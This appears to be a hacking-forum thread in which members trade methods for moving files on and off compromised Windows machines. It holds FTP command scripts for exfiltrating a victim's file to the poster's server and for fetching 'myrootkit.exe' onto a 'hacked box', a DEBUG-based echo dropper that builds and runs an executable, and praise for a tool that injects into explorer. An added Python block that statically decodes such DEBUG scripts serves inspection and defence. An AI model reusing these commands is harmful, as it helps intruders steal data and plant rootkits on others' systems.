Candypapa
I want to echo the file uptime.exe through the shell to the remote computer, like on here:
http://www.governmentsecurity.org/forum/in...showtopic=14202

Could anyone please help me build the echo commands?

10x ahead.
pedropalmeiro
Hi, I do it like this:

CODE

/////////////////////////////   download from hacked box     ///////////////////////

echo open mydynserver.myftp.org > c:\windows\ftplog.txt
echo test >> c:\windows\ftplog.txt
echo test >> c:\windows\ftplog.txt
echo bin >> c:\windows\ftplog.txt
echo put c:\shared~1\movies\madagascar.avi >> c:\windows\ftplog.txt
echo quit >> c:\windows\ftplog.txt
ftp -s:c:\windows\ftplog.txt
del c:\windows\ftplog.txt

///////////////


CODE


/////////////////////////////   upload to hacked box     ///////////////////////

echo open mydynserver.myftp.org > c:\windows\ftplog.txt
echo test >> c:\windows\ftplog.txt
echo test >> c:\windows\ftplog.txt
echo lcd c:\windows >> c:\windows\ftplog.txt
echo bin >> c:\windows\ftplog.txt
echo get myrootkit.exe >> c:\windows\ftplog.txt
echo quit >> c:\windows\ftplog.txt
ftp -s:c:\windows\ftplog.txt
del c:\windows\ftplog.txt

//////////////


FTPit is a great tool, especially the part of injecting into the explorer process.

Hope I helped.

palmeiro
Candypapa
No bro, that's not what I need.
I don't need the FTPit.
I want to echo the uptime.exe through the shell and not to upload it through ftp.
stay
use exe to text
QUOTE
if you have shell access to a server or client but no way to send file to
it then use this program to convert an .exe to .txt then paste each
line into your shell.

http://www.governmentsecurity.org/forum/in...showtopic=14939
Partizaan
Delete please. I wanted to post the code but it's too big. Sorry.
GSecur
Post it as an attachment
illwill
66 lines isn't too bad; I'm also attaching my compressed uptime console app,
only 929 bytes.
CODE

echo off
echo n Ashiyane > Q7X
echo rcx >> Q7X
echo 3A1 >> Q7X
echo w >> Q7X
echo q >> Q7X
debug <Q7X>nul & ren Ashiyane up.exe & up.exe & echo on
Candypapa
10x a lot,
helped me a lot.
Anyone know what the

QUOTE
echo rcx >> Q7X
echo 3A1 >> Q7X


stands for?
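
Added example, not part of the original thread: in a DEBUG script, `rcx` followed by a hex value sets the CX register, which the `w` command uses as the number of bytes to write, and 3A1 hex is 929 decimal, the size illwill gives for the attachment. The Python sketch below statically decodes such a script when it turns up in shell history or logs, without running it, so the written file can be sized and inspected; the sample input is constructed, and BX (the high word of the length) is assumed to be 0.

```python
import re

# Constructed sample (not from the thread): echo lines that build a tiny
# DEBUG script, in the same layout as the script posted above.
SAMPLE = r"""
echo n SAMPLE > Q7X
echo e 100 4D 5A 0 0 1 2 3 4  >> Q7X
echo e 108 AA BB  >> Q7X
echo rcx >> Q7X
echo A >> Q7X
echo w >> Q7X
echo q >> Q7X
"""

# Matches "echo <debug command> > file" and "echo <debug command> >> file".
ECHO = re.compile(r"^\s*echo\s+(.*?)\s*>{1,2}\s*\S+\s*$", re.IGNORECASE)


def decode_debug_script(text):
    """Statically rebuild the file a DEBUG script would write (nothing is run)."""
    cmds = []
    for line in text.splitlines():
        m = ECHO.match(line)
        body = (m.group(1) if m else line).strip()
        if body:
            cmds.append(body.split())
    mem, name, length = {}, None, None
    it = iter(cmds)
    for parts in it:
        op = parts[0].lower()
        if op == "n" and len(parts) > 1:        # n = name of the output file
            name = parts[1]
        elif op == "e" and len(parts) > 2:      # e = enter bytes at an offset
            base = int(parts[1], 16)
            for i, tok in enumerate(parts[2:]):
                mem[base + i] = int(tok, 16)
        elif op == "rcx" or (op == "r" and parts[1:2] and parts[1].lower() == "cx"):
            nxt = next(it, None)                # DEBUG prompts; next line is the value
            length = int(nxt[0], 16) if nxt else None
    if length is None:
        raise ValueError("no rcx length found; 'w' size is unknown")
    # 'w' writes CX bytes starting at offset 100h (BX, the high word, assumed 0)
    data = bytes(mem.get(0x100 + i, 0) for i in range(length))
    return {"name": name, "length": length, "data": data,
            "looks_like_exe": data[:2] == b"MZ"}


if __name__ == "__main__":
    r = decode_debug_script(SAMPLE)
    print(r["name"], r["length"], r["data"].hex(), r["looks_like_exe"])
```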
Candypapa
It seems that your up.exe is faking. I've got 121 days of uptime, and it shows only 20.

here is your 1K uptime:
CODE
C:\Documents and Settings\Admin\Desktop>up
up for 21 day(s) 10 hr(s) 59 min(s) 20 sec(s)


and here is another 48K uptime:
CODE

C:\Documents and Settings\Admin\Desktop>uptime
\\SERVER has been up for: 120 day(s), 21 hour(s), 8 minute(s), 4 second(s)


Anyone got a 100% working uptime.exe that counts a large amount of uptime and takes less than 48K?

Vixen
I've got this small program called ComInfo.exe which creates a ComInfo.txt like this:
CODE
----------------------------------------Computer Info---------------------------------------------

Operating System: Windows NT 5.1 Build 2600
Service Pack:  Windows NT
Processor Vendor: Intel
Processor: Pentium III "Coppermine"
etc..

Up Time: 11hr : 4min : 57sec

C: [50.974 MB \ 80.876 MB  Free disk space]

Coded By Digital_Chaos, idea by Oneiro.
All rights reserved ©

It's 53 kb, but I'm sure you can strip it to 48.
Candypapa
Nuh bro, it takes too much time to echo such a big file...
So is there any other fast way or a less KB file?
ir4ta
Maybe the Windows Resource-Kit is installed on the machine (it's not by default, but good admins install it ;-) ): try to start "srvinfo.exe" - it shows uptime, free space, installed patches, machine name, processors and much more... AND it's a Microsoft-Tool, so it's not detected (like some other tools) and runs on every Windows machine without problems. I never understood why ppl are coding their own info-tools when there already is a perfect tool onboard most machines...

regards



/edited

http://www.microsoft.com/technet/prodtechn...e/2_to6raa.mspx
http://www.dynawell.com/reskit/microsoft/win2000/srvinfo.zip

Candypapa
I've tried it on some OSes and there is no srvinfo.

CODE
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>srvinfo.exe
'srvinfo.exe' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>


CODE
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>srvinfo
'srvinfo' is not recognized as an internal or external command,
operable program or batch file.

C:\WINNT\system32>
sbt
you can also try "systeminfo" but it probably only works on xp and maybe on 2k3 dunno